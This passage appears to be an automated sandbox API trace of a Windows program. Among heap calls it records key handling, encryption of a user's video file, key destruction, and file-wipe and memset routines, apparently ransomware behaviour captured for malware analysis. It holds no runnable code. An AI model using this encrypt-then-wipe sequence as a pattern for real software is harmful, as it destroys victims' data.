[0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.901] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.904] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.904] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.904] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.905] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.905] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.905] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.905] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.905] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.905] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.905] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.906] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x35ac, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x35b0) returned 1 [0042.906] CharLowerBuffW (in: lpsz="byte[13745]", cchLength=0xb | out: lpsz="byte[13745]") returned 0xb [0042.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.906] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xacc140*, pdwDataLen=0x6ae220*=0x35ac, dwBufLen=0x35b0 | out: pbData=0xacc140*, pdwDataLen=0x6ae220*=0x35b0) returned 1 [0042.907] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.908] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.909] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0042.909] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.909] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.909] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.910] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.911] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x834c3d80, ftLastWriteTime.dwHighDateTime=0x1d5c341, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0x7c2100 [0042.911] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.911] CharLowerBuffW (in: lpsz="byte[13740]", cchLength=0xb | out: lpsz="byte[13740]") returned 0xb [0042.912] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.912] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.912] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.912] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: 